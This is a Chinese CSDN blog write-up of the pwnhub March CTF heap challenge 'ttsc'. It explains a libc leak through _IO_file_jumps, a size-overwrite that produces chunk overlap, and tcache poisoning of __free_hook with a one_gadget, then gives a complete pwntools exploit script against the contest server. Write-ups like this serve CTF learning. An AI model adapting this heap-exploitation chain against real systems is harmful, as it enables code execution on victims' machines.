pwnhub三月 ttsc

已于 2023-03-14 13:22:04 修改
阅读量296 收藏
点赞数 1
分类专栏: wp 文章标签: pwn
于 2023-03-14 13:05:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/129524136
版权

pwnhub三月 ttsc

拿到邀请码发现内部赛打不了,只能等比赛结束做了。
这里最大的坑就是有延迟,需要sleep来等一下,不然瞎发送
在这里插入图片描述
漏洞点很简单,可以直接覆盖size
但是次数都很少,正常打起来太麻烦了,但是开头给了三次输入功能
在这里插入图片描述
一开始以为没什么用,在随便输的时候发现-可以直接泄露出地址
age这里是lodword(v8),然后v2那里是hidwod,直接泄露出age这里的地址,发现是_IO_file_jumps
进一步获取libc,拿到libc之后就直接利用上面的漏洞打堆重叠,然后打fd到hook,打hook为ogg就行了

from pwn import *
from time import sleep

context(arch='amd64', os='linux', log_level='debug')

file_name = './ttsc'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('121.40.89.206', 20111)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def dbgg():
    raw_input()

menu = 'chs:'

def add(index, size, content):
    r.sendlineafter(menu, '1')
    sleep(0.2)
    r.sendlineafter('index?', str(index))
    sleep(0.2)
    r.sendlineafter('size:', str(size))
    sleep(0.2)
    r.send(content)
    sleep(0.2)

def delete(index):
    r.sendlineafter(menu, '2')
    sleep(0.2)
    r.sendlineafter('index?', str(index))
    sleep(0.2)

def edit(index, content):
    r.sendlineafter(menu, '3')
    sleep(0.2)
    r.sendlineafter('index?', str(index))
    sleep(0.2)
    r.sendlineafter('content:', content)
    sleep(0.2)

dbgg()

r.sendlineafter('what is your name?', 'a')
r.sendlineafter('age?', '-')
r.sendlineafter('high?', '-')

r.recvuntil('age: ')

leak_addr = int(r.recv(10), 10) + 0x100000000
li('leak_addr = ' + hex(leak_addr))

r.recvuntil('high: ')
leak_addr2 = int(r.recv(6), 10)
li('leak_addr2 = ' + hex(leak_addr2))

leak_addr = (leak_addr2 << 32) | leak_addr
li('leak_addr = ' + hex(leak_addr))

libc = ELF('./2.27/libc-2.27.so')
libc_base = leak_addr - libc.sym['_IO_file_jumps']
li('libc_base = ' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f2a5, 0x4f302, 0x10a2fc]
one_gadget = one[1] + libc_base

add(0, 0x18, 'a' * 8)
add(1, 0x18, 'a' * 8)
add(2, 0x18, 'a' * 8)

p1 = p64(0) * 3 + p64(0x41)
edit(0, p1)

r.sendline('')
delete(0)
delete(2)
delete(1)
p2 = p64(0) * 3 + p64(0x21) + p64(free_hook)

add(0, 0x30, p2)
add(1, 0x18, 'a' * 8)
add(2, 0x18, p64(one_gadget))
delete(0)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PWNHUB-公开赛一期MISC-Perseverance(WP)
afei001
03-26 453
目录 1.前言 2.错误思路 3.正确思路 3.1 Rot42_decode.py 3.2 MISC-Perseverance_getflag.py MISC题: 这是人做的题吗,如果能拿到邀请码,那都是站在pcat师傅的肩膀上爬上去的A????。 1.前言 这是PWNHUB公开赛。PWNHUB注册是需要邀请码的,不是随便谁都能注册的。然而,很不幸,这期公开赛我比没有拿到入场券。本来,flag就摆在我面前。但我却看不懂,悲哀啊。 afe...
mysql延迟_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_35972981的博客
01-18 832
转自cdxy师傅:https://www.cdxy.me/?p=789PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00...
pwnhub2023内部赛
weixin_73290593的博客
03-14 241
1.输出name时,%s可以leak栈地址,age和high部分,scanf输入‘-’可以不改变原来地址的值,即可泄露libc地址。2.edit存在off-by-one,来制造overlapping,控制fd指针,打__free_hook即可。
pwnpwnhub 3月公开赛|PWN专场 sh_v1_1
woodwhale的博客
03-12 565
pwnhub 3月公开赛 sh_v1_1
[pwnhub 2023.3] 内部赛pwn专题
weixin_52640415的博客
03-12 925
libc-2.31,libc-2.27无show 劫持_IO_2_1_stdout_,libc.sym['_environ']得到栈地址再在栈中写orw
淘宝商城ttsc
12-06
淘宝商城ttsc淘宝商城ttsc淘宝商城ttsc淘宝商城ttsc淘宝商城ttsc淘宝商城ttsc
java 视频基础及高级 网盘资源
01-17
链接:https://pan.baidu.com/s/1iMcDwT76RXJAzyWVnY_EmQ 提取码:ttsc 复制这段内容后打开百度网盘手机App,操作更方便哦
TTS中文语音朗读 C#源码及文件说明
04-13
TTS中文语音朗读C#源码及文件说明》 在信息技术领域,文本转语音(Text-to-Speech,简称TTS)是一项重要的技术,它能够将文本转换为可听见的语音,为用户提供便捷的交互体验。在.NET框架下,C#作为主流的开发语言...
JAVA视频下载
03-28
3. **JDBC与数据库**:深入理解JDBC API,数据库连接池管理,以及SQL语言和数据库设计。 4. **JPA与Hibernate**:介绍ORM(Object-Relational Mapping)技术,通过JPA规范和Hibernate框架简化数据库操作。 5. **...
PWNHUB-公开赛一期MISC-Perseverance(WP).pdf
03-22
这一道题,写了10页,这个WP还是参考pcat师傅的WP写的,我很菜,真的菜
fastdfs_clinet
10-19
3. **源代码**:可能包含Java源文件,展示了如何使用FastDFS API进行文件操作。 4. **测试代码**:如果有的话,会包含测试类,用于验证客户端功能的正确性。 5. **README或其他文档**:可能会有说明如何编译、运行和...
Pwnhub之目瞪狗呆
dengzhasong7076的博客
04-02 331
注入很明显,更多的是考技巧。 <?php require 'conn.php'; $id = $_GET['id']; if (preg_match("/(sleep|benchmark|outfile|dumpfile|load_file|join)/i", $_GET['id'])) { die("you bad bad!"); } $sql = "select * f...
HGAME-WEEK2-WRITE-UP
郁离歌丶的博客
03-09 5233
HGAME-WEEK2-WRITE-UPwebRandom?vim在线改代码导致源码泄露。读一下random.php.swp发现关键代码$emmm =unserialize(serialize($a));if(!is_object( $emmm)) {die("error") ;}$emmm-&gt;public = random_int(0,100000000);$emmm-&gt;secret...
pi_heif-0.17.0-pp310-pypy310_pp73-macosx_12_0_x86_64.whl
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
mmexport1722080103662.jpg
07-27
mmexport1722080103662.jpg
matlab 20244a 6
07-27
matlab 20244a 6
pi_heif-0.17.0-cp310-cp310-macosx_12_0_x86_64.whl
最新发布
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
pillow-10.4.0-cp312-cp312-musllinux_1_2_aarch64.whl
07-27
基本介绍 名称与起源:Pillow,原名为PIL(Python Imaging Library),但PIL只支持Python 2版本。随着Python 3的普及,Pillow作为PIL的一个分支出现,兼容Python 3并提供更多的功能和改进。 主要功能:Pillow支持多种图像格式的打开、保存、显示以及基本的图像操作和处理,如裁剪、缩放、旋转、翻转、滤镜应用等。 跨平台性:Pillow库可以在不同的操作系统上运行,包括Windows、Linux和MacOS等。 主要功能模块 Pillow库包含多个功能模块,每个模块都提供了特定的图像处理功能。以下是一些常用的模块: Image:用于处理图像文件,提供打开、保存、调整大小、旋转、裁剪、滤镜等功能。 ImageDraw:提供在图像上绘制各种形状(如线条、矩形、圆形)和文本的功能。 ImageFont:用于加载和使用TrueType字体文件,以便在图像上绘制文本时设置字体样式、大小和颜色。 ImageFilter:提供各种滤镜效果,如模糊、锐化、边缘增强等,用于图像增强、特效处理和图像识别等应用。 ImageEnhance:用于调整图像的亮度、对比度、颜色饱和度等参数,使图像更加清晰、明亮或具有特定的调色效果。 高级功能 除了基本的图像处理功能外,Pillow还支持一些高级功能,如色彩空间转换、直方图均衡化等。这些功能可以帮助用户进行更复杂的图像处理和分析。
生产管理体系设计全案.pptx
07-27
生产管理体系设计全案.pptx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值